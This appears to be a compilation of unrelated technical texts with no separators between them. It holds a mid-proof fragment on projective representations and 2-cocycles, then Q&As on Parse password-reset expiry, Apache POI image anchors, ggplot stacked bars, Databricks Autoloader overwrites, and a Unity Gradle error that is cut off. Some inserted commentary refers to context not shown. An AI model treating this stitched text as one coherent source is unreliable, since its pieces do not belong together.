We define $$\zeta(g,h) = \mu(gh)^{-1} \mu(g) \mu(h)$$ Consider $\pi(\zeta(g,h)) = \pi(\mu(gh))^{-1} \pi(\mu(g)) \pi(\mu(h)) = \rho(gh)^{-1} \rho(g) \rho(h) = \rho(1) =1$, so $$\zeta : G^2 \to \ker(\pi)$$ Now consider $$\zeta(gh,k)\zeta(g,h) = \mu(ghk)^{-1} \mu(gh) \mu(k) \mu(gh)^{-1} \mu(g) \mu(h) = \mu(ghk)^{-1} \mu(g)\mu(h)\mu(k)$$ versus $$\zeta(g,hk)\zeta(h,k) = \mu(ghk)^{-1} \mu(g) \mu(hk) \mu(hk)^{-1} \mu(h) \mu(k) = \mu(ghk)^{-1} \mu(g) \mu(h) \mu(k)$$ hence we get $$\zeta(gh,k) \zeta(g,h) = \zeta(g,hk)\zeta(h,k) \qquad \zeta \in Z^2(G,\ker(\pi))$$ This allows us to define a group $\hat G$ on the set $G \times K$ for any subgroup $K \leq \ker(\pi)$ that contains the image of $\zeta$ by $$\hat G: \qquad (g,k)\cdot (h,l) = (gh,kl\cdot \zeta(g,h))$$ The cocycle condition defining $Z^2(G,\ker(\pi))$ is precisely what is needed for $\hat G$ to be a group, that is, for the multiplication to be associative. Define $$\hat \rho :\hat G \to \hat H: (g,k) \mapsto \mu(g) k \qquad \phi:\hat G \to G:(g,k) \mapsto g$$ We calculate that $$\hat \rho( (g,k) \cdot (h,l) ) = \hat \rho((gh,kl\zeta(g,h))) = \mu(gh) kl \mu(gh)^{-1} \mu(g)\mu(h) = \mu(g)k \cdot \mu(h)l = \hat \rho(g,k) \hat \rho(h,l)$$ Hence $\hat \rho$ is a homomorphism. Now we check that $$\pi(\hat \rho((g,k))) = \pi(\mu(g)k) = \pi(\mu(g)) \pi(k) = \rho(g) \cdot 1 = \rho(g) =\rho(\phi((g,k)))$$ Hence the diagram commutes as was to be shown. $\square$ Lemma: Define $\tau(h) = \prod_{g \in G} \zeta(g,h)$ for $\zeta \in Z^2(G,K)$. Then $\tau(gh)^{-1} \tau(g) \tau(h) = {\zeta(g,h)}^{|G|}$. Proof (of lemma): Notice $$\begin{array}{rl} {\left(\zeta(h,k)\right)}^{|G|} \cdot \tau(hk) &= \prod_{g \in G} \left( \zeta(g,hk) \zeta(h,k) \right) \\ &= \prod_{g \in G} \left( \zeta(gh,k) \zeta(g,h) \right) \\ &= \left( \prod_{g \in G} \zeta(gh,k) \right) \cdot \left( \prod_{g \in G} \zeta(g,h) \right) \\ & = \tau(k) \cdot \tau(h) \end{array}$$ where the equality for $\tau(k)$ uses the fact that $\{ gh : g \in G \} = \{ g : g \in G \}$.
$\square$ Proof (of second proposition): Set $\tau(g)$ as in the lemma, and for each $g$, let $\bar \tau(g)$ be an $n$th root of $\tau(g)$, where $n = |G|$. Set $\bar \mu(g) = \mu(g) / \bar \tau(g)$ and so $$\bar \zeta(g,h) = \mu(gh)^{-1} \mu(g) \mu(h) \bar \tau(gh) \bar \tau(g)^{-1} \bar \tau(h)^{-1}$$ More importantly $$\begin{array}{rl} {\left( \bar \zeta(g,h) \right)}^{|G|} &= {\left(\zeta(g,h)\right)}^{|G|} \cdot {\left( \bar \tau(gh)\right)}^{|G|} \cdot {\left( \bar \tau(g) \right)}^{-|G|} \cdot {\left( \bar \tau(h) \right)}^{-|G|} \\ &= {\left(\zeta(g,h)\right)}^{|G|} \cdot \tau(gh) \tau(g)^{-1} \tau(h)^{-1} \\ &= {\left(\zeta(g,h)\right)}^{|G|} \cdot {\left(\zeta(g,h)\right)}^{-|G|} \\ &= 1 \end{array} $$ It is standard and not hard to check that $\zeta$ and $\bar \zeta$ define isomorphic $\hat G$ if we use the same $K$. The advantage now is that we can view $\bar \zeta \in Z^2(G,K)$ for $K \leq \{ k \in \ker(\pi) : k^n = 1\}$. By definition of $\hat G$ and $\phi$, one always has $\ker(\phi)\cong K$, so we are done. $\square$ Proof (of the corollary): The kernel of $\pi$ is exactly $R^\times$. Since $R \leq K$ and $K$ is algebraically closed, $K^\times$ is divisible, so an $n$th root of $\tau(h)$ always exists. Since $R$ is integrally closed in $K$, that $n$th root lies in $R$. Since $\tau(h) \in R^\times$ is a unit and $\bar \tau(h)$ divides it, $\bar \tau(h) \in R^\times$ must also be a unit. Hence the second proposition applies to choose $K \leq \{ r \in R^\times : r^{|G|} =1 \}$, the group of $n$th roots of unity, a finite cyclic group. $\square$
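To make the $G=C_2$ worry above concrete, here is how the construction plays out for the projective representation sending the generator $g$ to the class of a companion matrix (a sketch following the first proposition; the choice of $\mu$ and the resulting $K$ are my own illustration):

$$\mu(1) = I, \qquad \mu(g) = M = \begin{pmatrix} 0 & 1 \\ r & 0 \end{pmatrix}, \qquad M^2 = rI$$

so the only nontrivial cocycle value is $\zeta(g,g) = \mu(1)^{-1}\mu(g)\mu(g) = rI$, and we may take $K = \langle r \rangle \leq R^\times$. In $\hat G$ one computes $(g,1)^2 = (1,r)$, so if $r$ is not a root of unity then $K$ is infinite cyclic and $\hat G$ is infinite, matching the remark that the covering group is "not even finite". If instead $\sqrt{r} \in R^\times$, replacing $\mu(g)$ by $M/\sqrt{r}$ makes the cocycle trivial, and the projective representation lifts to an honest representation of $C_2$ itself; this is the sense in which the lift "roughly corresponds to taking a square root of $r$".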
Parse: reset password token Okay, I've googled all the things and can't find this anywhere. Super appreciative if anyone here knows: What is the validation period for the 'reset password' link generated by requestPasswordReset using Parse? From what I can tell, this isn't configurable, but I still need to handle expired links. As you said, you cannot configure the default password reset email sent by Parse. If you want a configurable system, Parse provides two email modules in Cloud Code (Mailgun and Mandrill) which you can use to implement your own customized password reset mechanism. So for example, when your user wants to reset their password, you email them a randomly generated code and save it with an expiry timestamp in your database. Then you ask your user to check their email and enter that code in the password reset page. You simply need to check the validity/expiry of the code before resetting their password. Mo, thank you very much, but this does not answer my question. I know about Mailgun, etc. I simply need to know when the created password links expire, if ever. You need to ask that from Parse engineers as only they would know. I simply tried to point you towards a home-brewed alternative solution.
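The home-brewed flow suggested in the answer can be sketched language-agnostically. This is an illustration only, not Parse API code: the function names, the 15-minute window, and the in-memory store are all assumptions; in Cloud Code you would persist the code and expiry in a Parse class and send it via Mailgun/Mandrill.

```python
import secrets
import time

TTL_SECONDS = 15 * 60  # assumed validity window; pick your own
_store = {}  # email -> (code, expires_at); stand-in for a database table

def issue_code(email, now=None):
    """Generate a random reset code and record when it expires."""
    now = time.time() if now is None else now
    code = secrets.token_urlsafe(8)  # the code you would email out
    _store[email] = (code, now + TTL_SECONDS)
    return code

def redeem_code(email, code, now=None):
    """Check validity/expiry of the code before allowing a password reset.

    Codes are single-use: the entry is removed on any redemption attempt.
    """
    now = time.time() if now is None else now
    entry = _store.pop(email, None)
    if entry is None:
        return False
    stored_code, expires_at = entry
    return code == stored_code and now <= expires_at
```

With this scheme the expiry is entirely under your control, which is exactly what the built-in requestPasswordReset link does not give you.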
apache poi XSSFClientAnchor not positioning picture with respect to dx1, dy1, dx2, dy2 I am trying to add an image to excel using apache-poi version 3.16. I am able to do that with HSSFWorkbook and XSSFWorkbook. But when I try to add spacing for the image, i.e. if I set dx1, dy1, dx2, dy2 coordinates on XSSFClientAnchor, it is not taking effect. The same thing works on HSSFClientAnchor. I am attaching both classes and the corresponding excel files generated. Could you please help me achieve the same result using XSSFClientAnchor. HSSF Class package poisamples; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; import org.apache.poi.hssf.usermodel.HSSFClientAnchor; import org.apache.poi.hssf.usermodel.HSSFPatriarch; import org.apache.poi.hssf.usermodel.HSSFPicture; import org.apache.poi.hssf.usermodel.HSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; public class HSSFImage { public static void main(String[] args) throws IOException { String imageFile = "test.png"; String outputFile = "image-sutpid.xls"; HSSFWorkbook workbook = new HSSFWorkbook(); HSSFSheet sheet = workbook.createSheet("Image"); HSSFClientAnchor anchor = new HSSFClientAnchor(100,100,100,100,(short)0, (short)0, (short)0, (short)3); sheet.setColumnWidth(0, 6000); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); int index = sheet.getWorkbook().addPicture(imageToBytes(imageFile), HSSFWorkbook.PICTURE_TYPE_PNG); HSSFPatriarch patriarch = sheet.createDrawingPatriarch(); HSSFPicture picture = patriarch.createPicture(anchor, index); picture.resize(); FileOutputStream fos = new FileOutputStream(outputFile); workbook.write(fos); } private static byte[] imageToBytes(String imageFilename) throws IOException { File imageFile; FileInputStream fis = null; ByteArrayOutputStream bos; int read; try { imageFile = new 
File(imageFilename); fis = new FileInputStream(imageFile); bos = new ByteArrayOutputStream(); while ((read = fis.read()) != -1) { bos.write(read); } return (bos.toByteArray()); } finally { if (fis != null) { try { fis.close(); fis = null; } catch (IOException ioEx) { // Nothing to do here } } } } } XSSF Class package poisamples; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import org.apache.poi.xssf.usermodel.XSSFClientAnchor; import org.apache.poi.xssf.usermodel.XSSFDrawing; import org.apache.poi.xssf.usermodel.XSSFPicture; import org.apache.poi.xssf.usermodel.XSSFSheet; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; public class XSSFImage { public static void main(String[] args) throws IOException { String imageFile = "test.png"; String outputFile = "image-sutpid.xlsx"; XSSFWorkbook workbook = new XSSFWorkbook(); XSSFSheet sheet = workbook.createSheet("Image"); XSSFClientAnchor anchor = new XSSFClientAnchor(100,100,100,100,0, 0, 0, 3); sheet.setColumnWidth(0, 6000); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); int index = sheet.getWorkbook().addPicture(imageToBytes(imageFile), XSSFWorkbook.PICTURE_TYPE_PNG); XSSFDrawing patriarch = sheet.createDrawingPatriarch(); XSSFPicture picture = patriarch.createPicture(anchor, index); picture.resize(); FileOutputStream fos = new FileOutputStream(outputFile); workbook.write(fos); } private static byte[] imageToBytes(String imageFilename) throws IOException { File imageFile; FileInputStream fis = null; ByteArrayOutputStream bos; int read; try { imageFile = new File(imageFilename); fis = new FileInputStream(imageFile); bos = new ByteArrayOutputStream(); while ((read = fis.read()) != -1) { bos.write(read); } return (bos.toByteArray()); } finally { if (fis != null) { try { fis.close(); fis = null; } catch (IOException ioEx) { // Nothing to do here } } 
} } } HSSF Result: XSSF Result: Image used: The problems are the different strange measurement units which Microsoft is using and the fact that the binary file system *.xls and the Office Open XML *.xlsx are very different not only in file storage but also in their general approach. As mentioned in ClientAnchor: "Note - XSSF and HSSF have a slightly different coordinate system, values in XSSF are larger by a factor of Units.EMU_PER_PIXEL". But this is not the whole truth. The meaning of the dx and dy is totally different. In the binary file system *.xls, the values are dependent on the factor of column-width / default column-width and row-height / default row-height. Don't ask me about the factor 14.75 used in my example. It is just trial&error. One thing to note about your code: if you want to resize the picture to its native size, then only a one-cell anchor is needed. This anchors the picture's upper left edge. A two-cell anchor is only needed if the anchor shall determine the picture's size. Then the first cell in the anchor anchors the picture's upper left edge while the second cell in the anchor anchors the picture's bottom right edge. The following example uses the measurement unit 1/256th of a character width for dx since column widths also are in this measurement unit. And it uses point as measurement unit for dy since row heights also are in this measurement unit.
import java.io.*; import org.apache.poi.ss.usermodel.*; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; import org.apache.poi.util.IOUtils; import org.apache.poi.util.Units; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.apache.poi.xssf.usermodel.XSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; import org.apache.poi.hssf.usermodel.HSSFSheet; public class CreateExcelWithPictures { private static Picture drawImageOnExcelSheet(Sheet sheet, int col1, int row1, int dx1/*1/256th of a character width*/, int dy1/*points*/, int col2, int row2, int dx2/*1/256th of a character width*/, int dy2/*points*/, String pictureurl, int picturetype, boolean resize) throws Exception { int DEFAULT_COL_WIDTH = 10 * 256; float DEFAULT_ROW_HEIGHT = 12.75f; Row row = sheet.getRow(row1); float rowheight1 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; row = sheet.getRow(row2); float rowheight2 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; int colwidth1 = sheet.getColumnWidth(col1); int colwidth2 = sheet.getColumnWidth(col2); InputStream is = new FileInputStream(pictureurl); byte[] bytes = IOUtils.toByteArray(is); int pictureIdx = sheet.getWorkbook().addPicture(bytes, picturetype); is.close(); CreationHelper helper = sheet.getWorkbook().getCreationHelper(); Drawing drawing = sheet.createDrawingPatriarch(); ClientAnchor anchor = helper.createClientAnchor(); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); anchor.setRow1(row1); //first anchor determines upper left position if (sheet instanceof XSSFSheet) { anchor.setDy1(dy1 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy1((int)Math.round(dy1 * Units.PIXEL_DPI / Units.POINT_DPI * 14.75 * DEFAULT_ROW_HEIGHT / rowheight1)); } anchor.setCol1(col1); if (sheet instanceof XSSFSheet) { anchor.setDx1((int)Math.round(dx1 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx1((int)Math.round(dx1 * 
Units.DEFAULT_CHARACTER_WIDTH / 256f * 14.75 * DEFAULT_COL_WIDTH / colwidth1)); } if (!resize) { anchor.setRow2(row2); //second anchor determines bottom right position if (sheet instanceof XSSFSheet) { anchor.setDy2(dy2 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy2((int)Math.round(dy2 * Units.PIXEL_DPI / Units.POINT_DPI * 14.75 * DEFAULT_ROW_HEIGHT / rowheight2)); } anchor.setCol2(col2); if (sheet instanceof XSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.DEFAULT_CHARACTER_WIDTH / 256f * 14.75 * DEFAULT_COL_WIDTH / colwidth2)); } } Picture picture = drawing.createPicture(anchor, pictureIdx); if (resize) picture.resize(); return picture; } public static void main(String[] args) throws Exception { Workbook workbook = new XSSFWorkbook(); //Workbook workbook = new HSSFWorkbook(); Sheet sheet = workbook.createSheet("Sheet1"); sheet.setColumnWidth(1, 6000/*1/256th of a character width*/); Row row = sheet.createRow(0); row.setHeightInPoints(100/*points*/); row = sheet.createRow(10); row.setHeightInPoints(50/*points*/); Picture picture; //two cell anchor in the same cell (B1) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 0, 1000/*1/256th of a character width*/, 10/*points*/, 1, 0, 5000/*1/256th of a character width*/, 90/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); //one cell anchor (B3) used with resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 2, 1000/*1/256th of a character width*/, 10/*points*/, 0, 0, 0, 0, "mikt1.png", Workbook.PICTURE_TYPE_PNG, true); //two cell anchor (B10 to B12) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 9, 1000/*1/256th of a character width*/, 10/*points*/, 1, 11, 5000/*1/256th of a character width*/, 10/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); if (workbook 
instanceof XSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xlsx")); } else if (workbook instanceof HSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xls")); } workbook.close(); } } Found at least the definition of dx and dy for binary *-xls file format. It is defined in 2.5.193 OfficeArtClientAnchorSheet. dx: The value is expressed as 1024th’s of that cell’s width. dy: The value is expressed as 256th’s of that cell’s height. Having that, the code should be like so: import java.io.*; import org.apache.poi.ss.usermodel.*; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; import org.apache.poi.util.IOUtils; import org.apache.poi.util.Units; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.apache.poi.xssf.usermodel.XSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; import org.apache.poi.hssf.usermodel.HSSFSheet; public class CreateExcelWithPictures { private static Picture drawImageOnExcelSheet(Sheet sheet, int col1, int row1, int dx1/*1/256th of a character width*/, int dy1/*points*/, int col2, int row2, int dx2/*1/256th of a character width*/, int dy2/*points*/, String pictureurl, int picturetype, boolean resize) throws Exception { int DEFAULT_COL_WIDTH = 10 * 256; float DEFAULT_ROW_HEIGHT = 12.75f; Row row = sheet.getRow(row1); float rowheight1 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; row = sheet.getRow(row2); float rowheight2 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; int colwidth1 = sheet.getColumnWidth(col1); int colwidth2 = sheet.getColumnWidth(col2); InputStream is = new FileInputStream(pictureurl); byte[] bytes = IOUtils.toByteArray(is); int pictureIdx = sheet.getWorkbook().addPicture(bytes, picturetype); is.close(); CreationHelper helper = sheet.getWorkbook().getCreationHelper(); Drawing drawing = sheet.createDrawingPatriarch(); ClientAnchor anchor = helper.createClientAnchor(); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); anchor.setRow1(row1); 
//first anchor determines upper left position if (sheet instanceof XSSFSheet) { anchor.setDy1(dy1 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy1((int)Math.round(dy1 * Units.PIXEL_DPI / Units.POINT_DPI * 256f / (rowheight1 * Units.PIXEL_DPI / Units.POINT_DPI))); } anchor.setCol1(col1); if (sheet instanceof XSSFSheet) { anchor.setDx1((int)Math.round(dx1 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx1((int)Math.round(dx1 * Units.DEFAULT_CHARACTER_WIDTH / 256f * 1024f / (colwidth1 * Units.DEFAULT_CHARACTER_WIDTH / 256f))); } if (!resize) { anchor.setRow2(row2); //second anchor determines bottom right position if (sheet instanceof XSSFSheet) { anchor.setDy2(dy2 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy2((int)Math.round(dy2 * Units.PIXEL_DPI / Units.POINT_DPI * 256f / (rowheight2 * Units.PIXEL_DPI / Units.POINT_DPI))); } anchor.setCol2(col2); if (sheet instanceof XSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.DEFAULT_CHARACTER_WIDTH / 256f * 1024f / (colwidth2 * Units.DEFAULT_CHARACTER_WIDTH / 256f))); } } Picture picture = drawing.createPicture(anchor, pictureIdx); if (resize) picture.resize(); return picture; } public static void main(String[] args) throws Exception { //Workbook workbook = new XSSFWorkbook(); Workbook workbook = new HSSFWorkbook(); Sheet sheet = workbook.createSheet("Sheet1"); sheet.setColumnWidth(1, 6000/*1/256th of a character width*/); Row row = sheet.createRow(0); row.setHeightInPoints(100/*points*/); row = sheet.createRow(10); row.setHeightInPoints(50/*points*/); Picture picture; //two cell anchor in the same cell (B1) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 0, 1000/*1/256th of a character width*/, 10/*points*/, 1, 0, 5000/*1/256th 
of a character width*/, 90/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); //one cell anchor (B3) used with resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 2, 1000/*1/256th of a character width*/, 10/*points*/, 0, 0, 0, 0, "mikt1.png", Workbook.PICTURE_TYPE_PNG, true); //two cell anchor (B10 to B12) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 9, 1000/*1/256th of a character width*/, 10/*points*/, 1, 11, 5000/*1/256th of a character width*/, 10/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); if (workbook instanceof XSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xlsx")); } else if (workbook instanceof HSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xls")); } workbook.close(); } } But then it would be better having all lengths in measurement unit pixel to avoid the conversion from pt and/or 256'th of a character width to pixels. See Why the same image export excel using HSSFWorkbook can use SXSSFWorkbook can not for example.
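The unit conversions in the answer boil down to a little arithmetic. Below is a sketch of the key constants and two of the conversions in plain Python (the OOXML drawing unit is the EMU, 914400 per inch; the 256ths-of-cell-height rule for HSSF dy comes from MS-XLS 2.5.193 as quoted above; the helper names are my own illustration, not POI API):

```python
# EMU ("English Metric Unit") constants used by XSSF anchors; these mirror
# the values in org.apache.poi.util.Units (914400 EMU per inch, 72 points
# per inch, 96 pixels per inch).
EMU_PER_INCH = 914400
POINT_DPI = 72
PIXEL_DPI = 96
EMU_PER_POINT = EMU_PER_INCH // POINT_DPI   # 12700
EMU_PER_PIXEL = EMU_PER_INCH // PIXEL_DPI   # 9525

def xssf_dy_from_points(points):
    """XSSF dy offset in EMUs for a vertical offset given in points."""
    return round(points * EMU_PER_POINT)

def hssf_dy_from_points(points, row_height_points):
    """HSSF dy offset, expressed as 256ths of the anchor cell's height
    (per MS-XLS 2.5.193), so it depends on the actual anchored row height."""
    return round(points / row_height_points * 256)
```

For example, a 10 pt offset becomes 127000 EMUs in XSSF, whereas in HSSF the same offset inside a default 12.75 pt row is expressed relative to that row's height, which is why the two file formats need separate code paths.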
stacked bar plot with ggplot I'm trying to make a stacked bar plot with the following dataframe: totalleft 1S 2S 3S 4S 12S 25S tests A-000 5 0 10 10 0 NA A-000 A-001 10 8 10 NA NA NA A-001 A-002 5 3 10 10 10 NA A-002 A-003 2 0 10 9 0 10 A-003 A-004 5 4 10 10 10 NA A-004 A-005 5 3 10 10 10 NA A-005 A-006 8 7 NA 10 10 NA A-006 A-009 9 10 NA NA 10 10 A-009 A-015 NA 1 NA NA NA NA A-015 A-016 NA 0 10 NA 6 9 A-016 A-017 NA 0 NA NA 4 NA A-017 A-020 NA 1 NA NA NA NA A-020 A-025 NA 0 NA NA 0 NA A-025 A-025a NA 0 NA NA 10 NA A-025a A-026 NA 9 10 NA 9 9 A-026 A-027 NA 0 10 NA 2 9 A-027 A-028 NA 0 NA NA 1 NA A-028 A-030 NA 7 NA NA 8 8 A-030 B-000 0 0 7 8 0 0 B-000 B-056 4 0 9 NA 0 5 B-056 B-076 9 9 NA NA 10 10 B-076 B-099 6 5 10 NA 5 9 B-099 B-102 7 0 NA NA 0 10 B-102 B-105 NA 6 NA NA NA 6 B-105 B-119 7 8 10 10 NA NA B-119 However, most of the documentation involves plotting against two factors: one for splitting up the bars along the X axis and the other for dividing up each bar. My question is how to split up the X axis by the factor tests and then divide up each bar by the corresponding columns (i.e. 1S, 2S, 3S, 4S, 12S, 25S). So, the first bar would be a bar for A-000, and 20% of it would be one color (for the 1S, 5/(5+10+10)), the second 40% would be another color (3S, 10/(5+10+10)), and the final 40% would be another color (4S, 10/(5+10+10)). I'm using this command as a reference: ggplot(diamonds, aes(clarity, fill=cut)) + geom_bar() from this website: http://docs.ggplot2.org/<IP_ADDRESS>/geom_bar.html# You need to munge the data to make it ggplot friendly. Have a look at ?melt from the reshape2 package So you need to reshape the data. You want a stacked barplot, so you will need to tell ggplot about variables 1S, 2S ... and tests.
#let's melt the data #library(reshape2) data.plot.m <-melt(data.plot, id.vars = "tests") #I stored your data in data.plot data.plot.m$variable <-gsub("X","",data.plot.m$variable) #as R doesn't like variable names beginning with numbers, #it adds an 'X' automatically when #we load the data with read.table so we remove this from melted data #now we plot the data ggplot(data.plot.m,aes(y = value,x = variable,fill = tests)) + geom_bar(stat = "identity") You will notice the order of the plots are different. We will need to reorder your variable: data.plot.m$variable <- factor(data.plot.m$variable, levels = unique(data.plot.m$variable)) #now plot again ggplot(data.plot.m,aes(y = value,x = variable,fill = tests))+ geom_bar(stat = "identity") I just realized you wanted this instead ggplot(data.plot.m,aes(y=value,x=tests,fill=variable))+geom_bar(stat="identity") and with the x-axis tick labels rotated ggplot(data.plot.m,aes(y=value,x=tests,fill=variable))+geom_bar(stat="identity") + theme(axis.text.x = element_text(angle=90)) Note how I switched x and fill Ahh, yes, this is excellent. One thing though...Can we put the test names on the X axis and the 1S, 2S, etc. as the colors? This seems like what you wanted?? library(reshape2) library(ggplot2) gg <- melt(totalleft,id="tests") ggplot(gg) + geom_bar(aes(x=tests, y=value, fill=variable), stat="identity")+ theme(axis.text.x=element_text(angle=-90, vjust=.2, hjust=0)) melt(...) converts your data frame from "wide" format (groups in different columns) to "long" format (all the values in one column (called value), and groups distinguished by a separate column (called variable).
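For readers more at home outside R, the wide-to-long reshape that melt(...) performs can be sketched in a few lines of plain Python (an illustration of the transformation only; the R code above is the actual answer):

```python
# A minimal wide-to-long reshape, mirroring reshape2::melt: the id columns
# stay on every output row, and each remaining column becomes one
# (variable, value) pair -- i.e. one stacked-bar segment per column.
def melt(rows, id_vars):
    long_rows = []
    for row in rows:
        ids = {k: row[k] for k in id_vars}
        for k, v in row.items():
            if k in id_vars:
                continue
            long_rows.append({**ids, "variable": k, "value": v})
    return long_rows

# one wide row from the question becomes one long row per non-id column
wide = [{"tests": "A-000", "1S": 5, "3S": 10, "4S": 10}]
long_form = melt(wide, ["tests"])
```

Once the data is in this long form, `x=tests`, `y=value`, `fill=variable` maps directly onto the ggplot aesthetics used in the answer.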
Dealing with overwritten files in Databricks Autoloader Main topic I am facing a problem that I am struggling a lot to solve: ingesting files that have already been captured by Autoloader but were overwritten with new data. Detailed problem description I have a landing folder in a data lake where every day a new file is posted. You can check the image example below: Each day an automation posts a file with new data. This file is named with a suffix meaning the Year and Month of the current period of the posting. This naming convention results in a file that is overwritten each day with the accumulated data extraction of the current month. The number of files in the folder only increases when the current month is closed and a new month starts. To deal with that I have implemented the following PySpark code using the Autoloader feature from Databricks: # Import functions from pyspark.sql.functions import input_file_name, current_timestamp, col # Define variables used in code below checkpoint_directory =<EMAIL_ADDRESS>data_source =<EMAIL_ADDRESS>source_format = "csv" table_name = "prod_gbs_gpdi.bronze_data.sapex_ap_posted" # Configure Auto Loader to ingest csv data to a Delta table query = ( spark.readStream .format("cloudFiles") .option("cloudFiles.format", source_format) .option("cloudFiles.schemaLocation", checkpoint_directory) .option("header", "true") .option("delimiter", ";") .option("skipRows", 7) .option("modifiedAfter", "2022-10-15 11:34:00.000000 UTC-3") # To ingest files that have a modification timestamp after the provided timestamp. .option("pathGlobFilter", "AP_SAPEX_KPI_001 - Posted Invoices in *.CSV") # A potential glob pattern to provide for choosing files. 
.load(data_source) .select( "*", current_timestamp().alias("_JOB_UPDATED_TIME"), input_file_name().alias("_JOB_SOURCE_FILE"), col("_metadata.file_modification_time").alias("_MODIFICATION_TIME") ) .writeStream .option("checkpointLocation", checkpoint_directory) .option("mergeSchema", "true") .trigger(availableNow=True) .toTable(table_name) ) This code allows me to capture each new file and ingest it into a Raw Table. The problem is that it works fine ONLY when a new file arrives. But if the desired file is overwritten in the landing folder the Autoloader does nothing because it assumes the file has already been ingested, even though the modification time of the file has changed. Failed attempt I tried to use the option modifiedAfter in the code. But it appears to serve only as a filter, preventing files from being ingested if their modification timestamp is before the threshold mentioned in the timestamp string. It does not reingest files that have already been seen. .option("modifiedAfter", "2022-10-15 14:10:00.000000 UTC-3") Question Does anyone know how to detect a file that was already ingested but has a different modified date, and how to reprocess it to load it into a table? I have figured out a solution to this problem. In the Autoloader Options list in the Databricks documentation it is possible to see an option called cloudFiles.allowOverwrites. If you enable that in the streaming query then whenever a file is overwritten in the lake the query will ingest it into the target table. Please note that this option will probably duplicate the data whenever a new file is overwritten. Therefore, downstream treatment will be necessary.
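Regarding the "downstream treatment" the solution mentions: since cloudFiles.allowOverwrites re-ingests the whole rewritten file, the bronze table ends up holding several versions of the same row. One common treatment is to keep only the latest version per business key using _MODIFICATION_TIME. The rule is sketched below in plain Python (in Spark this would typically be a row_number() window ordered by _MODIFICATION_TIME descending; the key fields here are hypothetical):

```python
def latest_per_key(records, key_fields, ts_field="_MODIFICATION_TIME"):
    """Keep only the most recently modified record for each key.

    records: iterable of dicts (rows from the bronze table)
    key_fields: business-key column names (hypothetical for this sketch)
    """
    best = {}
    for rec in records:
        key = tuple(rec[f] for f in key_fields)
        # a later _MODIFICATION_TIME wins; ties keep the first seen
        if key not in best or rec[ts_field] > best[key][ts_field]:
            best[key] = rec
    return list(best.values())
```

Applying this rule when building the silver layer means the repeated monthly-file overwrites collapse back to one current row per key.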
What??? Missing argument 'Gradle' in settings.gradle I got an error building my Unity project due to an error with the settings.gradle file. See more details here: FAILURE: Build failed with an exception. * Where: Settings file 'C:\Users\educp\Documents\Proyectos de unity\It's Complicated - copia\Library\Bee\Android\Prj\IL2CPP\Gradle\settings.gradle' line: 14 * What went wrong: A problem occurred evaluating settings 'Gradle'. > Could not find method dependencyResolutionManagement() for arguments [settings_9y2goy45mvwak9gvumvg94pgc$_run_closure1@4aecf086] on settings 'Gradle' of type org.gradle.initialization.DefaultSettings. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at https://help.gradle.org BUILD FAILED in 3s Picked up JAVA_TOOL_OPTIONS: -Dfile.encoding=UTF-8 UnityEngine.GUIUtility:ProcessEvent (int,intptr,bool&) When I went to the settings.gradle file, it displayed this: pluginManagement { repositories { gradlePluginPortal() google() mavenCentral() } } include ':launcher', ':unityLibrary' include 'unityLibrary:GoogleMobileAdsPlugin.androidlib' dependencyResolutionManagement { repositoriesMode.set(RepositoriesMode.PREFER_SETTINGS) repositories { google() mavenCentral() // Android Resolver Repos Start def unityProjectPath = 